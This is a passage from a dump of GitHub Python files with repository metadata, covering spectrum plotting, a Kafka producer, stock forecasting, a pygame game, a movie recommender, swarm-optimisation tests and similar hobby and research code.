fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.write_html(path + os.sep + 'line_flux_ratios.html', include_mathjax=\"cdn\")\n # fig.write_image(path + os.sep + 'line_flux_ratios_' + str(k) + '.pdf')\n\n if conf_dict:\n\n confidences = np.array([conf_dict[fi] for fi in conf_dict if fi != 'stack'])\n\n # Sort\n isort = np.argsort(confidences)\n confidences = confidences[isort]\n ratios = ratios[isort]\n amps = amps[isort]\n snrs = snrs[isort]\n asnr = amps * snrs\n if inspect:\n inspections = inspections[isort]\n\n std = np.nanstd(ratios)\n median = np.nanmedian(ratios)\n good = np.where((np.abs(ratios - median) < 3 * std) & (\n np.isfinite(confidences) & np.isfinite(ratios)))[0]\n ratios = ratios[good]\n confidences = confidences[good]\n asnr = asnr[good]\n\n # ntop = int(.2 * len(ratios[k]))\n # rsort = np.argsort(ratios[k])\n # top20 = ratios[k][rsort][len(ratios[k]) - ntop:]\n # top20c = confidences[k][rsort][len(ratios[k]) - ntop:]\n\n A = np.vstack((confidences, np.ones_like(confidences))).T\n m, c = np.linalg.lstsq(A, ratios, rcond=None)[0]\n x_model = np.linspace(confidences[0], confidences[-1], 1000)\n y_model = m * x_model + c\n\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n fig.add_trace(plotly.graph_objects.Scatter(\n x=confidences, y=ratios, mode='markers',\n marker=dict(size=4,\n color=asnr if not inspect else inspections,\n colorbar=dict(title=\"$A \\\\times SNR$\" if not inspect else \"Inspections\"),\n colorscale=\"ice\" if not inspect else \"spectral\",\n cmin=0 if not inspect else -1,\n cmax=4 if not inspect else 1),\n showlegend=False))\n # fig.add_trace(plotly.graph_objects.Scatter(x=top20c, y=top20, mode='markers',\n # marker=dict(size=4, color='#48CADB'), showlegend=False))\n fig.add_trace(plotly.graph_objects.Scatter(x=x_model, y=y_model,\n line=dict(color='black', width=.5, dash='dash'),\n showlegend=False))\n fig.update_layout(\n template='plotly_white',\n title='Linear Least Squares Fit: m=%.3f, b=%.3f' % (m, c),\n xaxis_title='Confidence Level',\n yaxis_title='${\\\\rm Line Flux Ratio Parameter}\\\\ \\\\mathcal{F}$',\n # yaxis_range=(-10, 10),\n # yaxis_constrain='domain'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.write_html(path + os.sep + 'line_flux_confidence_covar.html',\n include_mathjax=\"cdn\")\n # fig.write_image(path + os.sep + 'line_flux_confidence_covar_' + str(k) + '.pdf')\n\n else:\n raise NotImplementedError\n\n def save_json(self, filepath):\n \"\"\"\n Spectra.save_json but also converts universal_grid, stacked_flux, and stacked_err to lists.\n \"\"\"\n with open(filepath, 'w') as handle:\n serializable = copy.deepcopy(self)\n for key in serializable.keys():\n serializable[key].wave = serializable[key].wave.tolist()\n serializable[key].flux = serializable[key].flux.tolist()\n serializable[key].error = serializable[key].error.tolist()\n serializable.universal_grid = serializable.universal_grid.tolist()\n serializable.stacked_flux = serializable.stacked_flux.tolist()\n serializable.stacked_err = serializable.stacked_err.tolist()\n serializable.filters = [str(f) for f in serializable.filters]\n serializable = serializable.__dict__\n serialized = json.dumps(serializable, indent=4)\n handle.write(serialized)\n\n def save_toml(self, filepath):\n serializable = copy.deepcopy(self)\n serializable.filters = [str(f) for f in serializable.filters]\n serializable = serializable.__dict__\n with open(filepath, 'w') as handle:\n handle.write(toml.dumps(serializable, encoder=toml.TomlNumpyEncoder()))\n\n def save_fits(self, filepath, bin_num=(0,)):\n \"\"\"\n Save the stacked spectrum for a specific bin to a FITS file.\n\n :param filepath: str\n The filepath to save to.\n :param bin_num: tuple\n Which bins to save. Default is (0,).\n :return:\n \"\"\"\n hdu = astropy.io.fits.HDUList()\n for b in bin_num:\n header = astropy.io.fits.Header()\n # Spectrum has already been corrected for redshift and extinction, so make these 0\n header['z'] = 0.\n header['ebv'] = 0.\n # Rem: \"Since we aren't really concerned with the exact values of these quantities\n # (since we're dealing with stacks, their actual kinematic quantities are meaningless),\n # you can set the FWHM resolution to something small like 0.1 A. \"\n header['fwhm'] = 0.1\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.stacked_flux[b], header=header))\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.universal_grid[b]))\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.stacked_err[b]))\n hdu.writeto(filepath)\n return hdu\n\n def __repr__(self):\n s = f\"A collection of {len(self)} stacked spectra.\\n\"\n s += f\"Corrected: \\t {self.corrected}\\n\"\n s += f\"Stacked: \\t {True if len(self.stacked_flux) > 0 else False}\\n\"\n s += f\"Binned: \\t {'log_' if self.bin_log else ''}{self.binned}\"\n return s\n","repo_name":"Michael-Reefe/bifrost","sub_path":"bifrost/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":165575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14869500303","text":"from kafka import KafkaProducer\nfrom json import dumps\nimport time\nimport json\n\nproducer = KafkaProducer(\n acks = 0,\n bootstrap_servers = [\n \"spark-worker-01:9092\",\"spark-worker-02:9092\",\"spark-worker-03:9092\"\n ],\n value_serializer = lambda x: dumps(x).encode('utf-8')\n)\n\ntopic = 'tweet'\nstart = time.time()\nfor i in range(10):\n data = {'num': str(i)}\n producer.send(topic, value=data)\n producer.flush()\n time.sleep(2)\nprint('elapsed: ', time.time()-start)\n","repo_name":"skybluelee/Archeive","sub_path":"Docker/Kafka_Producer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39087734393","text":"import yfinance as yf\nimport pandas as pd\nimport numpy as np\nfrom statsmodels.tsa.ar_model import AutoReg\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\n\npredict_label = 'Adj Close'\n\ndef getData(ticker):\n return yf.download(ticker, period=\"max\")\n\n\n\ndef train_test(test_pr,ticker):\n test_pr = test_pr/100.0\n data = getData(ticker)\n dataLength = len(data)\n split_point = int((1-test_pr)*dataLength)\n train = data[:split_point]\n test = data[split_point:]\n return train,test\n\n\n#Forecast\ndef train_auto(train,test):\n y_hat = test.copy()\n model = AutoReg(train['Adj Close'],lags=1)\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef train_arimax(train,test):\n y_hat = test.copy()\n model = ARIMA(train[predict_label],order=(5,1,1))\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef train_ses(train,test):\n y_hat = test.copy()\n model = SimpleExpSmoothing(train[predict_label])\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef train_es(train,test):\n y_hat = test.copy()\n model = ExponentialSmoothing(train[predict_label])\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef predict(model,train,test,y_hat):\n return np.array(model.predict(start=len(train),end=len(train)+len(test)-1))\n#prediction\n\ndef run(ticker,test_pr,model_name='auto'):\n train,test = train_test(test_pr,ticker)\n if model_name == 'auto':\n model,y_hat = train_auto(train,test)\n forecast_name = 'AutoRegression'\n elif model_name == 'ses':\n model,y_hat = train_ses(train,test)\n forecast_name = 'Simple-Exp-Smoothing'\n elif model_name == 'es':\n model,y_hat = train_es(train,test)\n forecast_name = 'Expo-Smoothing'\n else:\n model,y_hat = train_arimax(train,test)\n forecast_name = 'Moving Average'\n \n y_hat[forecast_name] = predict(model,train,test,y_hat)\n return y_hat[[\"Adj Close\",forecast_name]],train\n \n\n","repo_name":"MilanVZinzuvadiya/StockPredict","sub_path":"stock_predict.py","file_name":"stock_predict.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6053735369","text":"from brownie import PetRegistry, accounts, network, config, MockV3Aggregator\nfrom scripts.helpful_scripts import (\n get_account,\n LOCAL_BLOCKCHAIN_ENVIRONMENTS,\n)\n\n\ndef deploy_pet_registry():\n account = get_account()\n pet_registry = PetRegistry.deploy(\n {\"from\": account},\n publish_source=config[\"networks\"][network.show_active()].get(\"verify\"),\n ) # publish_source=True is used to verify the contract on Etherscan when dealing with non-local networks\n print(f\"Contract deployed to {pet_registry.address}\")\n return pet_registry\n\n\ndef main():\n deploy_pet_registry()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Omaralsaabi/pets","sub_path":"browniee/scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43068412443","text":"import os\nfrom pytube import YouTube\n\n\nURLS_LIST_FILE = \"urls.txt\"\nMUSIC_OUTPUT_PATH = \"./music\"\n\n\nurls_to_fetch = []\n\nwith open(URLS_LIST_FILE, \"r\") as urls:\n for url in urls:\n urls_to_fetch.append((url.strip()))\n\nfor video_url in urls_to_fetch:\n yt = YouTube(video_url)\n video = yt.streams.filter(only_audio=True).first()\n out_file = video.download(output_path=MUSIC_OUTPUT_PATH)\n base, ext = os.path.splitext(out_file)\n new_file = base + \".mp3\"\n os.rename(out_file, new_file)\n print(yt.title + \" foi baixado com sucesso!\")","repo_name":"paulovitorweb/mp3-from-youtube","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"19898310082","text":"#Setting up the display.\r\n\r\nimport pygame\r\n\r\n#Size of the screen\r\nSCREEN_TITLE = \"Test Scenario\"\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 800\r\n#Colors of the screen\r\nWHITE_COLOR = (255,255,255)\r\nBLACK_COLOR = (0,0,0)\r\nclock = pygame.time.Clock() # generar el reloj del juego\r\npygame.font.init()\r\nfont = pygame.font.SysFont('comicsans',75)\r\n\r\nclass Game:\r\n TICK_RATE = 60 #Setear los fps con lo que va a correr el game.\r\n \r\n\r\n def __init__(self, title, image_path, width, height):\r\n self.title = title\r\n self.width = width\r\n self.height = height\r\n \r\n #Creating the window game screen, it uses a tuple of width and height\r\n self.game_screen = pygame.display.set_mode((width, height))\r\n #Setting the color of the screen\r\n self.game_screen.fill(WHITE_COLOR)\r\n #Setea el titulo de la ventana.\r\n pygame.display.set_caption(title)\r\n\r\n background_image = pygame.image.load(image_path)\r\n self.image = pygame.transform.scale(background_image,(width,height))\r\n \r\n def run_game_loop(self):\r\n \r\n is_game_over = False\r\n did_win = False\r\n direction = 0\r\n\r\n player_character = PlayerCharacter('player.png', 375, 700, 50, 50)\r\n enemy_0 = EnemyCharacter('enemy.png', 20, 400, 50 , 50)\r\n treasure = GameObject('treasure.png',375,50,50,50)\r\n while not is_game_over:\r\n \r\n for event in pygame.event.get(): #todos los eventos son KEYPRESS, MOUSECLICK, MOUSEMOVEMENT\r\n \r\n if event.type == pygame.QUIT: #LOS QUIT EVENTS SON UNA CONSTANTE DE PYGAME\r\n is_game_over = True\r\n #Detect when key is pressed down\r\n elif event.type == pygame.KEYDOWN:\r\n #Move up if up key pressed\r\n if event.key == pygame.K_UP:\r\n direction = 1\r\n #Move down if down key pressed \r\n elif event.key == pygame.K_DOWN:\r\n direction = -1\r\n elif event.key == pygame.K_LEFT:\r\n direction = 2\r\n elif event.key == pygame.K_RIGHT:\r\n direction = -2\r\n #detect when key is released\r\n elif event.type == pygame.KEYUP:\r\n #Stop movement when key no longer pressed.\r\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN or pygame.K_RIGHT or pygame.K_LEFT:\r\n direction = 0\r\n \r\n print(event)\r\n \r\n #Dibuja un rectangulo en la gamescreen del color que quiero en la pos que quiero con el width and height que quiero.\r\n #del x.0/y.0 se va a crear abajo derecha, por ender hay que retarle mitad de w y de h a la pos para que quede centrado. \r\n ##pygame.draw.rect(game_screen, BLACK_COLOR,[350,350,100,100])\r\n ##pygame.draw.circle(game_screen, BLACK_COLOR,(400,300),50)\r\n\r\n #se comporta como el rectangulo, se pone aca porq tiene que refreshear su pos.\r\n #game_screen.blit(player_image,(375,375))\r\n\r\n #Redraw the screen to white.\r\n self.game_screen.fill(WHITE_COLOR)\r\n self.game_screen.blit(self.image,(0,0))\r\n treasure.draw(self.game_screen)\r\n \r\n #Update player position\r\n player_character.move(direction, self.height, self.width)\r\n #Draw the player at the new position\r\n player_character.draw(self.game_screen)\r\n\r\n enemy_0.move(self.width)\r\n enemy_0.draw(self.game_screen)\r\n \r\n if player_character.detectCollision(enemy_0):\r\n is_game_over = True\r\n did_win = False\r\n text = font.render(\"You lost...\",True,BLACK_COLOR)\r\n self.game_screen.blit(text,(275,350))\r\n pygame.display.update()\r\n clock.tick(1)\r\n break\r\n elif player_character.detectCollision(treasure):\r\n is_game_over = True\r\n did_win = True\r\n text = font.render(\"YOU WIN!!\",True,BLACK_COLOR)\r\n self.game_screen.blit(text,(275,350))\r\n pygame.display.update()\r\n clock.tick(1)\r\n break\r\n \r\n pygame.display.update() #updatea el render del juego\r\n clock.tick(self.TICK_RATE) #Renderea el next frame\r\n\r\n if did_win:\r\n self.run_game_loop()\r\n else:\r\n return\r\n \r\n\r\n#Generic game object class to be subclassed by other objects\r\nclass GameObject:\r\n\r\n\r\n def __init__(self, image_path, x, y, width, height):\r\n\r\n #importa la imagen al proyecto\r\n object_image = pygame.image.load(image_path)\r\n #le cambia el tamanio a la imagen. Escala la imagen \r\n self.image = pygame.transform.scale(object_image,(width, height))\r\n \r\n self.xPos = x\r\n self.yPos = y\r\n\r\n self.width = width\r\n self.height = height\r\n\r\n def draw(self, background):\r\n background.blit(self.image, (self.xPos, self.yPos))\r\n\r\n#Class to represent the character controlled by the player \r\nclass PlayerCharacter(GameObject):\r\n #how many tiles the character moves per second\r\n SPEED = 6\r\n\r\n def __init__(self, image_path, x, y, width, height):\r\n super().__init__(image_path, x, y, width, height)\r\n #Move function will move character up if direction > 0 and down if direction < 0\r\n def move(self, direction, max_height, max_width):\r\n\r\n if direction == 1:\r\n self.yPos -= self.SPEED\r\n elif direction == -1:\r\n self.yPos += self.SPEED\r\n elif direction == 2:\r\n self.xPos -= self.SPEED\r\n elif direction == -2:\r\n self.xPos += self.SPEED\r\n\r\n if self.yPos >= max_height - 55:\r\n self.yPos = max_height - 55\r\n elif self.yPos <= 0:\r\n self.yPos = 0\r\n\r\n if self.xPos >= max_width - 50:\r\n self.xPos = max_width - 50\r\n elif self.xPos <= 0:\r\n self.xPos = 0\r\n def detectCollision(self, otherBody):\r\n if self.yPos > otherBody.yPos + otherBody.height:\r\n return False\r\n elif self.yPos + self.height < otherBody.yPos:\r\n return False\r\n\r\n if self.xPos > otherBody.xPos + otherBody.width:\r\n return False\r\n elif self.xPos + self.width < otherBody.xPos:\r\n return False\r\n\r\n return True \r\n\r\nclass EnemyCharacter(GameObject):\r\n \r\n SPEED = 6\r\n\r\n def __init__(self, image_path, x, y, width, height):\r\n super().__init__(image_path, x, y, width, height)\r\n \r\n def move(self, max_width):\r\n if self.xPos <= 20:\r\n self.SPEED = abs(self.SPEED)\r\n elif self.xPos >= max_width - 70:\r\n self.SPEED = -abs(self.SPEED)\r\n self.xPos += self.SPEED\r\n\r\n\r\n\r\npygame.init() #inicializa el pygame.\r\n\r\nnew_game = Game(SCREEN_TITLE,'background.png',SCREEN_WIDTH,SCREEN_HEIGHT)\r\nnew_game.run_game_loop()\r\n \r\n#Game loops, while loop that contains all of the game logic.\r\npygame.quit() #exit del programa\r\nquit() #exit del programa\r\n","repo_name":"guustigimenez/Games","sub_path":"reachingTreasure.py","file_name":"reachingTreasure.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20222159141","text":"#ask user for the name\nname = input(\"what is your nickname?\")\nwhile len(name) < 5:\n print(\"is to short\")\n name = input(\"what is your nickcame?\")\nprint(\"nice meet you\", name.title())\n\n\n#Write a function that takes in a list of numbers.\n# It should return the sum of all the numbers in the list.\n\n\ndef add_numbers(list_of_numbers) :\n sum = 0\n for number in list_of_numbers :\n sum += number\n return sum\nthe_list =[1,1,1]\nprint(add_numbers(the_list))\n\n","repo_name":"lumicojo/exercises","sub_path":"python/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13126138243","text":"import os\nimport logging\nimport json\n\nfrom config.config import get_server_config, get_timestamps_data, save_timestamps_data\nfrom core.controller import Controller\nfrom utils.utils import Utils\n\nclass Instruments:\n instruments_list = None\n symbol_to_instrument_map = None\n token_to_instrument_map = None\n\n @staticmethod\n def should_fetch_from_server():\n timestamps = get_timestamps_data()\n if 'instrumentsLastSavedAt' not in timestamps:\n return True\n last_saved_timestamp = timestamps['instrumentsLastSavedAt']\n now_epoch = Utils.get_epoch()\n if now_epoch - last_saved_timestamp >= 24 * 60 * 60:\n logging.info(\"Instruments: should_fetch_from_server() returning True as its been 24 hours since last fetch.\")\n return True\n return False\n\n @staticmethod\n def update_last_saved_timestamp():\n timestamps = get_timestamps_data()\n timestamps['instrumentsLastSavedAt'] = Utils.get_epoch()\n save_timestamps_data(timestamps)\n\n @staticmethod\n def load_instruments():\n server_config = get_server_config()\n instruments_file_path = os.path.join(server_config['deployDir'], 'instruments.json')\n if os.path.exists(instruments_file_path) == False:\n logging.warn('Instruments: instruments_file_path %s does not exist', instruments_file_path)\n return [] # returns empty list\n\n isd_file = open(instruments_file_path, 'r')\n instruments = json.loads(isd_file.read())\n logging.info('Instruments: loaded %d instruments from file %s', len(instruments), instruments_file_path)\n return instruments\n\n @staticmethod\n def save_instruments(instruments = []):\n server_config = get_server_config()\n instruments_file_path = os.path.join(server_config['deployDir'], 'instruments.json')\n with open(instruments_file_path, 'w') as isd_File:\n json.dump(instruments, isd_File, indent=2, default=str)\n logging.info('Instruments: Saved %d instruments to file %s', len(instruments), instruments_file_path)\n \n # Update last save timestamp\n Instruments.update_last_saved_timestamp()\n\n @staticmethod\n def fetch_instruments_from_server():\n instruments_list = []\n try:\n broker_handle = Controller.get_broker_login().get_broker_handle()\n logging.info('Going to fetch instruments from server...')\n instruments_list = broker_handle.instruments('NSE')\n instruments_list_fno = broker_handle.instruments('NFO')\n # Add FnO instrument list to the main list\n instruments_list.extend(instruments_list_fno)\n logging.info('Fetched %d instruments from server.', len(instruments_list))\n except Exception as e:\n logging.exception(\"Exception while fetching instruments from server\")\n return instruments_list\n\n @staticmethod\n def fetch_instruments():\n if Instruments.instruments_list:\n return Instruments.instruments_list\n\n instruments_list = Instruments.load_instruments()\n if len(instruments_list) == 0 or Instruments.should_fetch_from_server() == True:\n instruments_list = Instruments.fetch_instruments_from_server()\n # Save instruments to file locally\n if len(instruments_list) > 0:\n Instruments.save_instruments(instruments_list)\n\n if len(instruments_list) == 0:\n print(\"Could not fetch/load instruments data. Hence exiting the app.\")\n logging.error(\"Could not fetch/load instruments data. Hence exiting the app.\");\n exit(-2)\n \n Instruments.symbol_to_instrument_map = {}\n Instruments.token_to_instrument_map = {}\n for isd in instruments_list:\n trading_symbol = isd['tradingsymbol']\n instrument_token = isd['instrument_token']\n # logging.info('%s = %d', tradingSymbol, instrumentToken)\n Instruments.symbol_to_instrument_map[trading_symbol] = isd\n Instruments.token_to_instrument_map[instrument_token] = isd\n \n logging.info('Fetching instruments done. Instruments count = %d', len(instruments_list))\n # assign the list to static variable\n Instruments.instruments_list = instruments_list\n return instruments_list\n\n @staticmethod\n def get_instrument_data_by_symbol(trading_symbol):\n return Instruments.symbol_to_instrument_map[trading_symbol]\n\n @staticmethod\n def get_instrument_data_by_token(instrument_token):\n return Instruments.token_to_instrument_map[instrument_token]\n ","repo_name":"amoghkini/Algo-Trading-Framework","sub_path":"src/instruments/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"3756443220","text":"import pandas as pd\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise.model_selection import cross_validate\nfrom surprise import prediction_algorithms\nfrom surprise import accuracy, evaluate\nimport csv\n\nuser_ratings_df = pd.read_csv('train.csv')\ntest_ratings_df = pd.read_csv('test.csv')\nuser_ratings_df = user_ratings_df.drop(columns=['Timestamp'])\n\nuser_ratings_df = user_ratings_df.append(test_ratings_df)\n\nmovie_names = user_ratings_df.columns.values.tolist()[5:]\nmovies_dict = {movie: id for id, movie in enumerate(movie_names)}\n\n\nmovie_ratings = []\nfor index, row in user_ratings_df.iterrows():\n for key in movies_dict.keys():\n movie_ratings.append((row['ID'], movies_dict[key], row[key]))\n\n\nmovie_ratings_df = pd.DataFrame.from_records(\n data=movie_ratings, columns=['userID', 'itemID', 'rating'])\n\nreader = Reader(rating_scale=(1, 5))\nmovie_ratings_df.dropna(inplace=True)\n\ndata = Dataset.load_from_df(\n movie_ratings_df[['userID', 'itemID', 'rating']], reader)\n\ndata = data.build_full_trainset()\n\n\"\"\" sim_options = {'name': 'pearson_baseline',\n 'user_based': True\n } \"\"\"\n\nalgo = prediction_algorithms.SVD(n_epochs=100)\nalgo.fit(data)\npredictions = []\nprint(\"Item Id for despicable Me \", movies_dict['Rating [Despicable Me]'])\nmovie_id = movies_dict['Rating [Despicable Me]']\nfor id in test_ratings_df['ID']:\n pred = algo.predict(iid=movie_id, uid=id)\n predictions.append((id, pred.est))\n\nop = open(\"predictions.csv\", \"w\")\nwr = csv.writer(op)\nwr.writerow([\"ID\", \"Rating [Despicable Me]\"])\nwr.writerows(predictions)\nop.close()\n# Test data prepare\n\"\"\" test_ratings_df = pd.read_csv('test.csv')\ntest_movie_ratings = []\nfor index, row in test_ratings_df.iterrows():\n for key in movies_dict.keys():\n test_movie_ratings.append((row['ID'], movies_dict[key], row[key]))\n\ntest_movie_ratings_df = pd.DataFrame.from_records(\n data=test_movie_ratings, columns=['ID', 'movieID', 'rating'])\n\ntest_data = Dataset.load_from_df(\n test_movie_ratings_df[['ID', 'movieID', 'rating']], reader) \"\"\"\n","repo_name":"Anuragis/Movie-Recommender","sub_path":"Movie-Recommender.py","file_name":"Movie-Recommender.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4885414700","text":"import logging\n\nimport numpy as np\nfrom .pipeline.graph import OptimizationGraph\nfrom .optimizer.swarm import Swarm\nfrom .optimizer.testfunctions import (\n rosenbrock,\n binhAndKorn,\n animateSwarm,\n animateSwarm2,\n rosenbrockContour,\n rosenbrockContourConstrained,\n)\n\n# Set logging formats\nlogging.basicConfig(\n level=logging.INFO,\n format=(\"[%(filename)8s] [%(levelname)4s] : %(funcName)s - %(message)s\"),\n)\n\n\nif __name__ == \"__main__\":\n\n # ========================================================\n\n CASE1 = True\n CASE2 = True\n CASE3 = True\n CASE4 = True\n\n # ========================================================\n if CASE1:\n logging.info(50 * \"=\")\n logging.info(\"CASE1 - Start Testing\")\n logging.info(50 * \"=\")\n\n itermax = 40\n xbounds = [(-5, 10), (0, 15)]\n ybounds = [(0, 13500)]\n cbounds = []\n\n def branin(X, a, b, c, r, s, t):\n return (\n a * (X[:, 1] - b * X[:, 0] ** 2 + c * X[:, 0] - r) ** 2\n + s * (1 - t) * np.cos(X[:, 0])\n + s,\n None,\n )\n\n swarm = Swarm(\n branin,\n xbounds,\n ybounds,\n cbounds,\n nparticles=10,\n minimumSwarmSize=10,\n args=(1, 5.1 / (4 * np.pi ** 2), 5 / np.pi, 6, 10, 1 / (8 * np.pi)),\n )\n swarm.initialize()\n swarm.iterate(itermax)\n\n swarm.restart()\n swarm.iterate(5)\n\n logging.info(swarm.xbest)\n logging.info(swarm.ybest)\n\n logging.info(\"CASE1 - passed :)\")\n\n # ========================================================\n if CASE2:\n logging.info(50 * \"=\")\n logging.info(\"CASE2 - Start Testing\")\n logging.info(50 * \"=\")\n\n # Define toolchain\n graph = OptimizationGraph(\n xdim=2,\n rdim=2,\n tindex=[0],\n cindex=[],\n xlabels=[\"x\", \"y\"],\n rlabels=[\"z\", \"c\"],\n )\n graph.singleProcessChain(rosenbrock)\n\n # Optimizer stuff\n itermax = 40\n xbounds = [(-4, 4), (-4, 4)]\n ybounds = [(0, 13500)]\n cbounds = []\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n\n swarm.initialize()\n swarm.iterate(itermax)\n\n swarm.restart(resetParticles=False)\n swarm.iterate(5)\n\n # Postprocessing\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm(Xcine, Ycine, rosenbrockContour, xbounds=xbounds, store=False)\n # tc.postprocess()\n\n logging.info(\"CASE2 - passed :)\")\n\n # ========================================================\n if CASE3:\n logging.info(50 * \"=\")\n logging.info(\"CASE3 - Start Testing\")\n logging.info(50 * \"=\")\n\n # Define toolchain\n graph = OptimizationGraph(\n xdim=2, rdim=4, tindex=[0, 1], cindex=[2, 3], xlabels=[\"x\", \"y\"]\n )\n graph.singleProcessChain(binhAndKorn)\n\n # Optimizer stuff\n itermax = 30\n xbounds = [(0, 5), (0, 3)]\n ybounds = [(0, 60), (0, 60)]\n cbounds = [(0, 25), (7.7, 1e2)]\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n swarm.initialize()\n swarm.iterate(itermax)\n\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm2(Xcine, Ycine, xbounds=xbounds, ybounds=ybounds)\n # graph.postprocess()\n\n logging.info(\"CASE3 - passed :)\")\n\n # ========================================================\n if CASE4:\n logging.info(50 * \"=\")\n logging.info(\"CASE4 - Start Testing\")\n logging.info(50 * \"=\")\n # Define toolchain\n\n graph = OptimizationGraph(\n xdim=2,\n rdim=2,\n tindex=[0],\n cindex=[1],\n xlabels=[\"x\", \"y\"],\n rlabels=[\"z\", \"c\"],\n )\n graph.singleProcessChain(rosenbrock)\n\n # Optimizer stuff\n itermax = 20\n xbounds = [(-4, 4), (-4, 4)]\n ybounds = [(0, 13500)]\n cbounds = [(0, 1.3)]\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n\n swarm.initialize()\n swarm.iterate(itermax)\n\n # swarm.restart(resetParticles=True)\n # swarm.iterate(5)\n\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm(\n Xcine, Ycine, rosenbrockContourConstrained, xbounds=xbounds, store=False\n )\n # tc.postprocess()\n logging.info(\"CASE4 - passed :)\")\n","repo_name":"cmb87/MultiobjectiveOptimization","sub_path":"moop/test_swarm.py","file_name":"test_swarm.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1612018137","text":"from fly import config\nfrom fly.gui import constants as c\nfrom fly.gui import genericelements as gel\nfrom fly.gui import helpers as guihelpers\nfrom fly.gui.elements import interface\n\n\nclass SpeedBarGUI(interface.GUIElementInterface):\n\n \"\"\"Horizontal bar on screen which fills as the speed increases.\n This speed bar is empty to start and grows as the number of words\n increases until the number of words reaches the max (set in constants).\n \n Its colour is green if accuracy is 100% and gradually goes red as accuracy\n drops.\n\n Additionally, the words per minute (wpm) and accuracy are displayed in a\n label on the bar.\n \"\"\"\n \n def __init__(self):\n self.speed_blocks = []\n self.display_bar = config.DISPLAY_SPEED_BAR\n self.number_of_bars_to_display = 0\n\n self.__create_speed_bar_underlay()\n self.__create_speed_bar()\n\n def __create_speed_bar_underlay(self):\n\n \"\"\"Create the base speed bar to display on screen.\"\"\"\n\n speed_bar_x_pos = guihelpers.centred_for_x(c.SPEED_BAR_WIDTH)\n self.speed_bar_underlay = \\\n gel.DisplayPanel((speed_bar_x_pos, \n c.SPEED_BAR_Y),\n (c.SPEED_BAR_WIDTH, c.SPEED_BAR_HEIGHT), \n \"SPEED/ACCURACY: \", \n c.SPEED_BAR_BACKGROUND_COLOR, \n c.SPEED_BAR_TEXT_COLOR, \n c.SPEED_BAR_TEXT_MARGIN)\n\n def __create_speed_bar(self):\n\n \"\"\"Create the stripe that indicates speed.\"\"\"\n\n for i in range(c.SPEED_BAR_BLOCK_COUNT):\n speed_bar_block = \\\n gel.SpeedBarBlock((guihelpers.speed_bar_pos_x(i),\n c.SPEED_BAR_Y + 20),\n (c.SPEED_BAR_BLOCK_WIDTH, 2),\n (0,0,0))\n self.speed_blocks.append(speed_bar_block)\n\n def toggle_display(self):\n\n \"\"\"Toggle display of speed bar.\"\"\"\n\n self.display_bar = (not self.display_bar)\n\n def set_words_per_minute(self, words_per_minute):\n\n \"\"\"Display the number of words per minute the user is typing.\n Display it in the length of the speed bar, and as a text label.\n\n @param words_per_minute: number of words per minute user is typing\n @type words_per_minute: float\n \"\"\"\n\n self.speed_bar_underlay.append_text(\" wpm: %s, \" \n % int(round(words_per_minute, 0)))\n speed_bar_len_float = min(words_per_minute/c.SPEED_BAR_MAX_SPEED, 1)\n speed_bar_length = int(c.SPEED_BAR_BLOCK_COUNT*(speed_bar_len_float))\n\n 